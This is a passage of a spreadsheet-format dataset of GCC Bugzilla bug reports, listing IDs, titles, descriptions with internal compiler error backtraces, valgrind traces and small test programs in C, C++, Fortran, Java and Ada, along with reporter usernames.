0x62bb59 c_parser_translation_unit
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:1323
0x62bb59 c_parse_file()
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:15449
0x6875b2 c_common_parse_file()
        /mnt/svn/gcc-trunk/gcc/c-family/c-opts.c:1058
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-226486-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-226486-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl --without-isl
Thread model: posix
gcc version 6.0.0 20150803 (experimental) (GCC) 
Tested revisions:
r226486 - ICE
gcc-5-branch r225803 - OK</t>
  </si>
  <si>
    <t>GCC-918</t>
  </si>
  <si>
    <t>COMMON -fdebug-kludge problem</t>
  </si>
  <si>
    <t>The  -fdebug-kludge option seems broken when using common blocks
A short program like 
      program main
      real*8 v
      common /vc/v
      print*'Helo world'
      end
gives the following output when compiled:
g77 -g -fdebug-kludge main.f
../../../gcc/f/com.c:15210: failed assertion `(t == NULL_TREE) || (DECL_CONTEXT (x) == NULL_TREE)'
main.f: In program `main':
main.f:9: Internal error: Aborted.
Please submit a full bug report.
See  for instructions.
Compilation exited abnormally with code 1 at Tue Nov 28 15:59:05
Release:
g77 version 2.96 20000731  gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
(Red Hat Linux 7.0) (from FSF-g77 version 0.5.26 20000731 (Red Hat Linux 7.0))
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/spec
How-To-Repeat:
As described above</t>
  </si>
  <si>
    <t>tp</t>
  </si>
  <si>
    <t>GCC-56974</t>
  </si>
  <si>
    <t>c++ ref qualifiers not represented in DWARF</t>
  </si>
  <si>
    <t>C++11 added ref qualifiers for methods like &amp; and &amp;&amp;.
As far as I can tell these are not present in the debuginfo.
I think they ought to be represented somehow otherwise
gdb can't implement overloading properly.</t>
  </si>
  <si>
    <t>GCC-42659</t>
  </si>
  <si>
    <t>gnatmake thinks libraries aren't supported</t>
  </si>
  <si>
    <t>Use of a library GPR (which works fine with i386-apple-darwin10) fails with libraries are not supported on this platform.
This is because gnattools/configure uses the test
  powerpc-*-darwin* | *86-*-darwin*)
    TOOLS_TARGET_PAIRS=mlib-tgt-specific.adb&lt;mlib-tgt-specific-darwin.adb
I believe that in fact *-*-darwin* would work just fine see attached patch.</t>
  </si>
  <si>
    <t>GCC-49218</t>
  </si>
  <si>
    <t>Incorrect optimization of a 'for' loop creates an infinite loop</t>
  </si>
  <si>
    <t>Created attachment 24388
The program reads a number and then it should output it back. After incorrect optimization however the program hangs up
The following small program hangs up if compiled under gcc 4.6 with -O2.
The program reads a number (it can be any number '5' for example) and then it performs some silly for-loop and then it should output the same number.
In gcc 4.6 with -O2 however the program hangs up without outputting anything. It looks like the loop (which can be doing less that 10 operations in reality) is 'optimized' into an infinite loop.</t>
  </si>
  <si>
    <t>personal</t>
  </si>
  <si>
    <t>GCC-81469</t>
  </si>
  <si>
    <t>std::uncaught_exception should be marked as deprecated for C++1z</t>
  </si>
  <si>
    <t>I think that in C++1z/17 std::uncaught_exception should be marked as [[deprecated]].</t>
  </si>
  <si>
    <t>daniel.gutson</t>
  </si>
  <si>
    <t>GCC-3614</t>
  </si>
  <si>
    <t>failing overloading of template member functions in template classes</t>
  </si>
  <si>
    <t>// I cannot see a problem with the syntax of the following 
// fragment shouldn't one be able to overload template and 
// non-template functions in class scopes and be able to declare 
// them out of line?  From the examples in Sec. 14 of the standard
// my guess is that the fragment below uses the syntax intended for 
// this purpose. EDG compilers treat this fragment as I expect (the 
// executable returns 0 to the environent)
// the _inline_ definition of the functions IN the class 
// body works as expected
// Stefan Schwarzer sts@ica1.uni-stuttgart.de
// 11:30 tiger_sts:gnu/current&gt; g++ -v
// Reading specs from /local/gcc-3.0/lib/gcc-lib/alphaev56-dec-osf4.0f/3.0/specs
// Configured with: /share/src/gcc-3.0/configure --prefix=/local/gcc-3.0 --host=
alphaev56-dec-osf4.0f --target=alphaev56-dec-osf4.0f
// Thread model: single
// gcc version 3.0
// 11:30 tiger_sts:gnu/current&gt; g++ class_tmpl_ovld.cc
// class_tmpl_ovld.cc:28: redefinition of `int A::f()'
// class_tmpl_ovld.cc:25: `int A::f()' previously declared here
// class_tmpl_ovld.cc:28: expected 2 levels of template parms for `int A::f()
' 
//   got 1
// class_tmpl_ovld.cc:20: confused by earlier errors bailing out
template
struct A {
  int f()  
  template
  int f()
}
template template
int A::f(){ return M } 
template
int A::f(){ return 1 }
// should compile and return 0
int main(){
  A a
  return a.f()
}
Release:
gcc-3.0
Environment:
alpha OSF 5.0 ix86-linux
How-To-Repeat:
see problem description</t>
  </si>
  <si>
    <t>sts</t>
  </si>
  <si>
    <t>GCC-35083</t>
  </si>
  <si>
    <t>[4.3 regression] ICE: in extract_insn at recog.c:1990</t>
  </si>
  <si>
    <t>Building gcc-trunk rev 132111 (2008-02-05) for i386-rtems* (elf w/ newlib) fails with:
...
make[7]: Entering directory `/users/rtems/src/toolchains/BUILD/i386-rtems4.9/i386-rtems4.9/soft-float/newlib/libm'
Making all in math
make[8]: Entering directory `/users/rtems/src/toolchains/BUILD/i386-rtems4.9/i386-rtems4.9/soft-float/newlib/libm/math'
/users/rtems/src/toolchains/BUILD/i386-rtems4.9/./gcc/xgcc -B/users/rtems/src/toolchains/BUILD/i386-rtems4.9/./gcc/ -nostdinc -B/users/rtems/src/toolchains/BUILD/i386-rtems4.9/i386-rtems4.9/soft-float/newlib/ -isystem /users/rtems/src/toolchains/BUILD/i386-rtems4.9/i386-rtems4.9/soft-float/newlib/targ-include -isystem /users/rtems/src/toolchains/gcc-trunk/newlib/libc/include -B/opt/rtems-4.9/i386-rtems4.9/bin/ -B/opt/rtems-4.9/i386-rtems4.9/lib/ -isystem /opt/rtems-4.9/i386-rtems4.9/include -isystem /opt/rtems-4.9/i386-rtems4.9/sys-include  -msoft-float -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.16.0\ -DPACKAGE_STRING=\newlib\ 1.16.0\ -DPACKAGE_BUGREPORT=\\ -I. -I../../../../../../../gcc-trunk/newlib/libm/math -I../../../../../../../gcc-trunk/newlib/libm/math/../common -O2 -DMALLOC_PROVIDED -DEXIT_PROVIDED -DMISSING_SYSCALL_NAMES -DSIGNAL_PROVIDED -DREENTRANT_SYSCALLS_PROVIDED -DHAVE_OPENDIR -DNO_EXEC -DHAVE_FCNTL -fno-builtin      -O2 -g -g -O2    -msoft-float -c -o lib_a-sf_erf.o `test -f 'sf_erf.c' || echo '../../../../../../../gcc-trunk/newlib/libm/math/'`sf_erf.c
../../../../../../../gcc-trunk/newlib/libm/math/sf_erf.c: In function 'erfcf':
../../../../../../../gcc-trunk/newlib/libm/math/sf_erf.c:222: error: unrecognizable insn:
(insn 33 32 34 6 ../../../../../../../gcc-trunk/newlib/libm/math/sf_erf.c:171 (set (reg:SF 84)
        (plus:SF (reg:SF 85)
            (reg:SF 85))) -1 (nil))
../../../../../../../gcc-trunk/newlib/libm/math/sf_erf.c:222: internal compiler error: in extract_insn at recog.c:1990
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[8]: *** [lib_a-sf_erf.o] Error 1</t>
  </si>
  <si>
    <t>GCC-52043</t>
  </si>
  <si>
    <t>[4.7 Regression] [C++0x] ICE: SIGSEGV in tsubst_copy (pt.c:12081) with -Wreturn-type</t>
  </si>
  <si>
    <t>Created attachment 26506
reduced testcase (from g++.dg/cpp0x/variadic101.C)
Compiler output:
$ gcc -std=c++0x testcase.C -Wreturn-type
==14033== Invalid read of size 2
==14033==    at 0x5F48D5: tsubst_copy(tree_node* tree_node* int tree_node*) (pt.c:12081)
==14033==    by 0x5F5EB7: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) (pt.c:14260)
==14033==    by 0x5E7A5D: tsubst_expr(tree_node* tree_node* int tree_node* bool) (pt.c:13312)
==14033==    by 0x609AA5: tsubst_pack_expansion(tree_node* tree_node* int tree_node*) (pt.c:9478)
==14033==    by 0x5F7915: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) (pt.c:13817)
==14033==    by 0x5E7A5D: tsubst_expr(tree_node* tree_node* int tree_node* bool) (pt.c:13312)
==14033==    by 0x5FBFEC: tsubst(tree_node* tree_node* int tree_node*) (pt.c:11777)
==14033==    by 0x66C342: dump_template_bindings(tree_node* tree_node* VEC_tree_gc*) (error.c:325)
==14033==    by 0x66DB4A: dump_function_decl(tree_node* int) (error.c:1434)
==14033==    by 0x66FC6A: cp_printer(pretty_print_info* text_info* char const* int bool bool bool) (error.c:2641)
==14033==    by 0x13534E0: pp_base_format(pretty_print_info* text_info*) (pretty-print.c:509)
==14033==    by 0x13541DF: pp_base_format_verbatim(pretty_print_info* text_info*) (pretty-print.c:565)
==14033==    by 0x13542CD: pp_verbatim(pretty_print_info* char const* ...) (pretty-print.c:751)
==14033==    by 0x66243A: maybe_print_instantiation_context(diagnostic_context*) (error.c:3006)
==14033==    by 0x66E8B1: cp_diagnostic_starter(diagnostic_context* diagnostic_info*) (error.c:2834)
==14033==    by 0x13510F4: diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*) (diagnostic.c:548)
==14033==    by 0x1351A2E: warning(int char const* ...) (diagnostic.c:682)
==14033==    by 0x5C3338: finish_function(int) (decl.c:13501)
==14033==    by 0x621902: instantiate_decl(tree_node* int bool) (pt.c:18753)
==14033==    by 0x62973B: instantiate_pending_templates(int) (pt.c:18839)
==14033==    by 0x660D93: cp_write_global_declarations() (decl2.c:3770)
==14033==    by 0xB813DB: toplev_main(int char**) (toplev.c:573)
==14033==    by 0x66E009C: (below main) (in /lib64/libc-2.13.so)
==14033==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==14033== 
'
Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The original testcase (g++.dg/cpp0x/variadic101.C) ICEs with:
gcc -std=c++0x -ftoplevel-reorder -fcompare-debug variadic101.ii -wrapper valgrind-q--num-callers=40
==21191== Invalid read of size 2
==21191==    at 0x5F48D5: tsubst_copy(tree_node* tree_node* int tree_node*) (pt.c:12081)
==21191==    by 0x5F5EB7: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) (pt.c:14260)
==21191==    by 0x5E7A5D: tsubst_expr(tree_node* tree_node* int tree_node* bool) (pt.c:13312)
==21191==    by 0x609AA5: tsubst_pack_expansion(tree_node* tree_node* int tree_node*) (pt.c:9478)
==21191==    by 0x5F7915: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) (pt.c:13817)
==21191==    by 0x5E7A5D: tsubst_expr(tree_node* tree_node* int tree_node* bool) (pt.c:13312)
==21191==    by 0x5FBFEC: tsubst(tree_node* tree_node* int tree_node*) (pt.c:11777)
==21191==    by 0x66C342: dump_template_bindings(tree_node* tree_node* VEC_tree_gc*) (error.c:325)
==21191==    by 0x66DB4A: dump_function_decl(tree_node* int) (error.c:1434)
==21191==    by 0x66F5D8: decl_as_string(tree_node* int) (error.c:2560)
==21191==    by 0x70FD00: cxx_printable_name_internal(tree_node* int bool) (tree.c:1605)
==21191==    by 0xC61BC9: dump_enumerated_decls(_IO_FILE* int) (tree-ssa-live.c:1314)
==21191==    by 0xBEE238: execute_cleanup_cfg_post_optimizing() (tree-optimize.c:182)
==21191==    by 0xA8C4A4: execute_one_pass(opt_pass*) (passes.c:2081)
==21191==    by 0xA8C864: execute_pass_list(opt_pass*) (passes.c:2136)
==21191==    by 0xBEEBBD: tree_rest_of_compilation(tree_node*) (tree-optimize.c:420)
==21191==    by 0x841419: cgraph_expand_function(cgraph_node*) (cgraphunit.c:1819)
==21191==    by 0x8432EB: cgraph_optimize() (cgraphunit.c:1886)
==21191==    by 0x843949: cgraph_finalize_compilation_unit() (cgraphunit.c:1328)
==21191==    by 0x6618EA: cp_write_global_declarations() (decl2.c:4057)
==21191==    by 0xB813DB: toplev_main(int char**) (toplev.c:573)
==21191==    by 0x66E009C: (below main) (in /lib64/libc-2.13.so)
==21191==  Address 0x0 is not stack'd malloc'd or (recently) free'd
...
gcc: internal compiler error: Segmentation fault (program valgrind)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compiler output - 4.6:
$ gcc -std=c++0x testcase.C -Wreturn-type -c
testcase.C: In function 'decltype (deref(u.f() deref::args ...)) deref(T int Args ...) [with T = Container &gt; Args = {} decltype (deref(u.f() deref::args ...)) = Container]':
testcase.C:19:14:   instantiated from here
testcase.C:13:1: warning: no return statement in function returning non-void [-Wreturn-type]
testcase.C: In function 'T deref(T) [with T = Container]':
testcase.C:13:1:   instantiated from 'decltype (T deref(u.f() deref::args ...)) deref(T int Args ...) [with T = Container &gt; Args = {} decltype (deref(u.f() deref::args ...)) = Container]'
testcase.C:19:14:   instantiated from here
testcase.C:8:2: warning: no return statement in function returning non-void [-Wreturn-type]
Tested revisions:
r183666 - crash
r182547 - OK
r180540 - OK
4.6 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-7149</t>
  </si>
  <si>
    <t>Re: real.c: In function `make_nan': `TFbignan' undeclared</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; Hmmm forgive my scepticism but if there's a bug in this area
 &gt; then it should be reproducible in 3 or 4 lines.
 The code below reproduces the problem.  The problem has something
 to do with the processing of '!' and defined.  If I remove '!' then
 defining/undefing DEC yields the correct result.
 &gt; Are you using the ISO or traditional preprocessor?
 I presume ISO since '-pedantic' was specified in the command to compile
 real.c.  However this doesn't seem to matter.
 It's likely that something has been miscompiled in stage1 but the same
 compiler bootstrapped 3.1.  It's amazing that the build of the C compiler
 nearly completed in stage2 before a problem showed up.
 Dave
 -- 
 J. David Anglin                                  dave.anglin@nrc.ca
 National Research Council of Canada              (613) 990-0752 (FAX: 952-6605)
 #define DEC 1
 #if !defined(DEC)
 static void enan (void)
 #endif
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-24813</t>
  </si>
  <si>
    <t>ICE with scalarization LEN of character types</t>
  </si>
  <si>
    <t>../Src/fparser.f90:329: internal compiler error: in gfc_conv_array_constructor_expr at fortran/trans-expr.c:1975
The problem is at the line CHARACTER (LEN=LEN(Funcs)) :: fun
It goes away if changed to: LEN=LEN(Funcs(cAbs))
but I believe the standard says the argument to LEN() can be
array valued (I don't have my copy handy but my DEC Reference Manual
which is rarely wrong says this.)
Here's the code:
MODULE fparser
  IMPLICIT NONE
  INTEGER PARAMETER :: is = SELECTED_INT_KIND(4) ! Data type of bytecode
  PRIVATE
  SAVE
  INTEGER(is)                              PARAMETER :: cImmed   = 1          &amp;
                                                         cAbs     = 8          &amp;
                                                         cExp     = 9          &amp;
                                                         cLog10   = 10         &amp;
                                                         cLog     = 11         &amp;
                                                         cSqrt    = 12         &amp;
                                                         cSinh    = 13         &amp;
                                                         cCosh    = 14         &amp;
                                                         cTanh    = 15         &amp;
                                                         cSin     = 16         &amp;
                                                         cCos     = 17         &amp;
                                                         cTan     = 18         &amp;
                                                         cAsin    = 19         &amp;
                                                         cAcos    = 20         &amp;
                                                         cAtan    = 21         &amp;
                                                         VarBegin = 22
  CHARACTER (LEN=5) DIMENSION(cAbs:cAtan) PARAMETER :: Funcs    = (/ 'abs  ' &amp;
                                                                       'exp  ' &amp;
                                                                       'log10' &amp;
                                                                       'log  ' &amp;
                                                                       'sqrt ' &amp;
                                                                       'sinh ' &amp;
                                                                       'cosh ' &amp;
                                                                       'tanh ' &amp;
                                                                       'sin  ' &amp;
                                                                       'cos  ' &amp;
                                                                       'tan  ' &amp;
                                                                       'asin ' &amp;
                                                                       'acos ' &amp;
                                                                       'atan ' /)
CONTAINS
  FUNCTION MathFunctionIndex (str) RESULT (n)
    IMPLICIT NONE
    CHARACTER (LEN=*) INTENT(in) :: str
    INTEGER(is)                   :: nj
    INTEGER                       :: k
    CHARACTER (LEN=LEN(Funcs))    :: fun
    n = 0
    DO j=cAbscAtan                                          ! Check all math functions
       k = MIN(LEN_TRIM(Funcs(j)) LEN(str))   
       CALL LowCase (str(1:k) fun)
       IF (fun == Funcs(j)) THEN                             ! Compare lower case letters
          n = j                                              ! Found a matching function
          EXIT
       END IF
    END DO
  END FUNCTION MathFunctionIndex
END MODULE fparser</t>
  </si>
  <si>
    <t>dbs</t>
  </si>
  <si>
    <t>GCC-53510</t>
  </si>
  <si>
    <t>[4.8 Regression] OOM while compile some code</t>
  </si>
  <si>
    <t>While reducing PR 53500 for a different ICE on the trunk.  I ran into a case where it would cause all the memory to be eaten up.
Compile with -std=c++11.  Sorry it is a big testcase but it is hard to reduce as I have not set the limits yet</t>
  </si>
  <si>
    <t>GCC-36322</t>
  </si>
  <si>
    <t>ICE with PROCEDURE using a complicated interface</t>
  </si>
  <si>
    <t>Found at
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/ff7ae6c7a7860bca/60213205751117d4
The full program should be checked after fixing this problem.
==28722== Invalid read of size 4
==28722==    at 0x407597: gfc_is_compile_time_shape (array.c:2184)
==28722==    by 0x46B11B: resolve_symbol (resolve.c:6811)
==28722==    by 0x477326: traverse_ns (symbol.c:3014)
==28722==    by 0x4659DF: resolve_types (resolve.c:9179)
module other_fun
   use ISO_C_BINDING
   implicit none
   character allocatable save :: my_message(:)
   abstract interface
      function abstract_fun(x)
         use ISO_C_BINDING
         import my_message
         implicit none
         integer(C_INT) x(:)
         character(size(my_message)C_CHAR) abstract_fun(size(x))
      end function abstract_fun
   end interface
   contains
    subroutine get_funloc(x)
      procedure(abstract_fun):: x
    end subroutine get_funloc
end module other_fun</t>
  </si>
  <si>
    <t>GCC-3470</t>
  </si>
  <si>
    <t>sparc64-elf libgcc problems.</t>
  </si>
  <si>
    <t xml:space="preserve">	building a compiler on NetBSD/sparc64 does not work.  while building
	libgcc the following error occurs:
./xgcc -B./ -B/local/gcc/sparc64-elf/bin/ -isystem /local/gcc/sparc64-elf/include -O2   -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -I. -I. -I/croc/mrg/gcc/egcs/gcc -I/croc/mrg/gcc/egcs/gcc/.  -I/croc/mrg/gcc/egcs/gcc/config -I/croc/mrg/gcc/egcs/gcc/../include  -DL_fixunstfdi -c /croc/mrg/gcc/egcs/gcc/libgcc2.c -o libgcc/./_fixunstfdi.o
/croc/mrg/gcc/egcs/gcc/libgcc2.c: In function `__fixunstfdi':
/croc/mrg/gcc/egcs/gcc/libgcc2.c:864: Internal compiler error in simplify_subreg at simplify-rtx.c:2198
	i also get the same failure using a (not-yet-contributed) configuration
	for NetBSD/sparc64 and also when cross compiling from several hosts
	to a sparc64 target.
Release:
3.1 20010627 (experimental)
Environment:
System: NetBSD powerofseven.eterna.com.au 1.5W NetBSD 1.5W (POWEROFSEVEN) #337: Tue Jun 12 02:04:32 EST 2001 mrg@powerofseven.eterna.com.au:/orb/a/obj.sys/POWEROFSEVEN sparc64
host: sparc64-unknown-elf
build: sparc64-unknown-elf
target: sparc64-unknown-elf
configured with: /croc/mrg/gcc/egcs/configure --prefix=/local/gcc sparc64-elf
How-To-Repeat:
	attempt to build a sparc64 compiler.  i was using gcc-current updated
	20010727 09:09 UTC.</t>
  </si>
  <si>
    <t>mrg</t>
  </si>
  <si>
    <t>GCC-32177</t>
  </si>
  <si>
    <t>g++ crashes on some valid OpenMP code</t>
  </si>
  <si>
    <t>This is with gcc version 4.3.0 20070528 (experimental) and gcc-4.1.1 (redhat FC5 version). I suspect it is also true for all intermediate versions...
The attached program when compiled with g++ and the flags -fopenmp gives the
following diagnostic and aborts compilation:
futuna-&gt; /usr/local/gcc-4.3/bin/g++ -fopenmp BugOMP1.C
BugOMP1.C: In function â€˜void f()â€™:
BugOMP1.C:14: internal compiler error: in lower_stmt at gimple-low.c:282
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
There is an obvious workaround in this case: remove the A().s() call from the loop. This is related to the destructor in class A (suppress it and the problem disappears). The problem is that lower_stmt is presented with a WITH_CLEANUP_EXPR node which it is not prepared to handle. I suspect that with -fopenmp g++ does not create a valid gimple code in this case...
I tried the dubious make lower_stmt do nothing with this code and of course something else fails afterwards.</t>
  </si>
  <si>
    <t>theodore.papadopoulo</t>
  </si>
  <si>
    <t>GCC-23891</t>
  </si>
  <si>
    <t>[4.0 Regression] Problem folding static fields across packages</t>
  </si>
  <si>
    <t>The following test case derived from Eclipse/ecj fails to compile on HEAD and
current 4.0 branch. This is a regression since 4.0.0.
package ast
import classfmt.*
public abstract class ASTNode implements ClassFileConstants {
}
---
package ast
public class EqualExpression extends ASTNode {
        public void resolveType() {
                long foo = JDK1_5
        }
}
---
package classfmt
public interface ClassFileConstants {
        int MINOR_VERSION_0 = 0
        long JDK1_5 = (long) ClassFileConstants.MINOR_VERSION_0
}
$ gcj -c ast/EqualExpression.java
./classfmt/ClassFileConstants.java: In class 'ast.EqualExpression':
./classfmt/ClassFileConstants.java: In method 'ast.EqualExpression.resolveType()':
./classfmt/ClassFileConstants.java:5: error: Undefined variable or class name:
â€˜ClassFileConstants.MINOR_VERSION_0â€™.
        long JDK1_5 = (long) ClassFileConstants.MINOR_VERSION_0
                                ^
1 error</t>
  </si>
  <si>
    <t>GCC-1170</t>
  </si>
  <si>
    <t>gcj crashes with inner classes/interfaces invokation/usage.</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: The already checked in patch fixes the problem (and the
    test case runs correctly:)
      http://gcc.gnu.org/ml/gcc-patches/2000-04/msg01001.html
</t>
  </si>
  <si>
    <t>GCC-39793</t>
  </si>
  <si>
    <t>gnatxref generates incomplete output for overloaded operator</t>
  </si>
  <si>
    <t>This bug report only concerns gnatxref not the gnat compiler.
Given the following :
package bug_op is
 type Vector is array (1 .. 1) of Integer
 function 
end bug_op
with Ada.Integer_Text_Io use Ada.Integer_Text_Io
package body bug_op is
  V : Vector
function &amp;(A B : Vector) return Vector is
begin
  return Vector'(1 =&gt; 42)
end 
begin
  V := Vector'(1 =&gt; 1) 
  Put(V(1) 0)
end bug_op
the .ali files contains the line:
4V10*&amp;{3A6} 4&gt;14 4&gt;17 14|4b10 7l5 7t8 10r24
which is correct but gnat xref only outputs:
&amp;                                              function
  Decl:  bug_op.ads             4:10
(i.e. it is missing the body and reference)
if the &amp; is changed to a + in the original code the .ali file contains:
4V10*+{3A6} 4&gt;14 4&gt;17 14|4b10 7l5 7t8 10r24
and gnatxref gets it and outputs the correct references:
+                                              function
  Decl:  bug_op.ads             4:10
  Body:  bug_op.adb             4:10
  Ref:   bug_op.adb            10:24
Note that gnatxref shipped with gnat 3.4.2 behaves properly in both circumstances. 
Sincerely
David
http://www.midoan.com</t>
  </si>
  <si>
    <t>GCC-44256</t>
  </si>
  <si>
    <t>When using -flto and -fwhole-program the compiler/linker crash</t>
  </si>
  <si>
    <t>I saw that with GCC4.5 my software-only 3D renderer got a sizeable speed boost
when using -flto (during compilation) and -flto -fwhole-program (during linking). I saw this working successfully with GCC4.5.0.
I then tried the same thing with 4.5.1 - and got an internal compiler error.
The crash doesn't happen when compiling it happens at the final - link - stage
so there's no preprocessed input to provide... I can only hope that you will be able to reproduce it on your environment.
The output error message from the linking stage:
lto1: internal compiler error: in gimple_register_type at gimple.c:3820
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /usr/local/bin/g++45 returned 1 exit status
collect2: lto-wrapper returned 1 exit status
*** Error code 1
The source code that triggers the bug is here:
   http://users.softlab.ntua.gr/~ttsiod/renderer-2.x.latest.tar.bz2
Just use a simple ./configure &amp;&amp; make - it should be enough to trigger the error.
The GCC I used:
$ g++45 -v
Using built-in specs.
COLLECT_GCC=g++45
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc45/gcc/x86_64-portbld-freebsd8.0/4.5.1/lto-wrapper
Target: x86_64-portbld-freebsd8.0
Configured with: ./../gcc-4.5-20100520/configure --enable-lto=yes --with-libelf=/usr/local --disable-nls --libdir=/usr/local/lib/gcc45 --libexecdir=/usr/local/libexec/gcc45 --program-suffix=45 --with-as=/usr/local/bin/as --with-gmp=/usr/local --with-gxx-include-dir=/usr/local/lib/gcc45/include/c++/ --with-ld=/usr/local/bin/ld --with-libiconv-prefix=/usr/local --with-system-zlib --disable-rpath --enable-libgcj --prefix=/usr/local --mandir=/usr/local/man --infodir=/usr/local/info/gcc45 --build=x86_64-portbld-freebsd8.0
Thread model: posix
gcc version 4.5.1 20100520 (prerelease) (GCC)
My system:
$ uname -a
FreeBSD freebsd.gizi.gr 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
The compilation options generated by configure and used during compilation:
g++45 -DHAVE_CONFIG_H -I.  -I/usr/local/include/SDL -I/usr/local/include -D_GNU_SOURCE=1 -D_REENTRANT -I./../lib3ds-1.3.0/ -fopenmp  -O3 -g -Wall -Wextra -fomit-frame-pointer -ffast-math -funsafe-math-optimizations -mtune=native -flto -msse -mrecip -mfpmath=sse -msse2 -mssse3 -DNDEBUG -MT renderer-Base3d.o -MD -MP -MF .deps/renderer-Base3d.Tpo -c -o renderer-Base3d.o `test -f 'Base3d.cc' || echo './'`Base3d.cc
Compilation doesn't trigger the error linking does and these are the linking params:
g++45  -O3 -g -Wall -Wextra -fomit-frame-pointer -ffast-math -funsafe-math-optimizations -mtune=native -flto -msse -mrecip -mfpmath=sse -msse2 -mssse3 -DNDEBUG    -o renderer renderer-renderer.o renderer-Algebra.o renderer-Camera.o  renderer-Keyboard.o renderer-Light.o  renderer-Object3D.o renderer-Scene.o  renderer-Screen.o renderer-Base3d.o -fwhole-program -L/usr/local/lib -Wl-rpath/usr/local/lib -lSDL -pthread  -fopenmp ../lib3ds-1.3.0/lib3ds/.libs/lib3ds.a -lstdc++
Anything else I might help with don't hesitate to ask.</t>
  </si>
  <si>
    <t>ttsiodras</t>
  </si>
  <si>
    <t>GCC-38369</t>
  </si>
  <si>
    <t>[4.3 regression] ICE (SIGSEGV in number_of_iterations_exit)</t>
  </si>
  <si>
    <t>seen with 4.3 20081129 not seen on 4.2 and trunk
$ gcc -c -O1 spinmc_factory_test.ii 
spinmc_factory.C: In constructor 'AbstractSpinSim::AbstractSpinSim(const alps::ProcessList&amp; const alps::Parameters&amp; int) [with MAT = SquareMatrix]':
spinmc_factory.C:194: internal compiler error: Segmentation fault
Please submit a full bug report
Program received signal SIGSEGV Segmentation fault.
0x083826ba in number_of_iterations_exit (loop=0xf22d11b0 exit=0xe5a33640 niter=0xffe39bd8 warn=0 '\0')
    at ../../src/gcc/tree-ssa-loop-niter.c:429
429           cond = COND_EXPR_COND (last_stmt (e-&gt;src))</t>
  </si>
  <si>
    <t>GCC-66654</t>
  </si>
  <si>
    <t>[6 Regression] ice in digest_init_r at cp/typeck2.c:1103</t>
  </si>
  <si>
    <t>Created attachment 35845
gzipped C++ source code
For gcc trunk dated 20150624 I get
$ ../results/bin/gcc -c -std=c++11 bug214.cc
In file included from /home/dcb/rpmbuild/BUILD/MuseScore-2.0.0/libmscore/stafftext.h:18:0
                 from /home/dcb/rpmbuild/BUILD/MuseScore-2.0.0/libmscore/plugins.cpp:34:
/home/dcb/rpmbuild/BUILD/MuseScore-2.0.0/libmscore/staff.h:118:44: internal compiler error: in digest_init_r at cp/typeck2.c:1103
       QColor _color      { MScore::defaultColor }
                                            ^
0x690163 digest_init_r
	../../src/trunk/gcc/cp/typeck2.c:1103
0x692e40 digest_init_flags(tree_node* tree_node* int)
	../../src/trunk/gcc/cp/typeck2.c:1154
0x692e40 digest_nsdmi_init(tree_node* tree_node*)
	../../src/trunk/gcc/cp/typeck2.c:1170
0x70b4a2 cp_parser_late_parse_one_default_arg
	../../src/trunk/gcc/cp/parser.c:24304</t>
  </si>
  <si>
    <t>GCC-9436</t>
  </si>
  <si>
    <t>[ABI] passing a class template followed by a template value of this class</t>
  </si>
  <si>
    <t>// well just compile with g++-3.2.1 -c these few lines
// and magically the bug appears
// It comes from the affectation of defaultValue by T()
// in the following template
template  
struct A{  
  A() : t(defaultValue) {}
  T t
}
template  void fct(A a){}
struct B{
  void hello(){ fct( a )}
  A a  
}
Release:
g++-3.2.1
Environment:
SunOS 5.8</t>
  </si>
  <si>
    <t>GCC-5537</t>
  </si>
  <si>
    <t>Error compiling simple bytecode with jsr</t>
  </si>
  <si>
    <t>This case involves calling return in a try/finally block
and compiling from bytecode.
public class A 
{
  public static void main(String[] args)
  {
    try{
      return
    }
    finally{
    }
  }
}
gcj compiles correctly from source but fails on the corresponding
bytecode (attached):
$ gcj A.class
A.java: In class `A':
A.java: In method `A.main(java.lang.String[])':
A.java:6: verification error at PC=8
A.java:6: loading local variable 1 which has unknown type
$ javap -c A.class
Compiled from A.java
public class A extends java.lang.Object {
    public A()
    public static void main(java.lang.String[])
}
Method A()
   0 aload_0
   1 invokespecial #1 
   4 return
Method void main(java.lang.String[])
   0 jsr 10
   3 return
   4 astore_1
   5 jsr 10
   8 aload_1
   9 athrow
  10 astore_2
  11 ret 2
Exception table:
   from   to  target type
     0     4     4   any
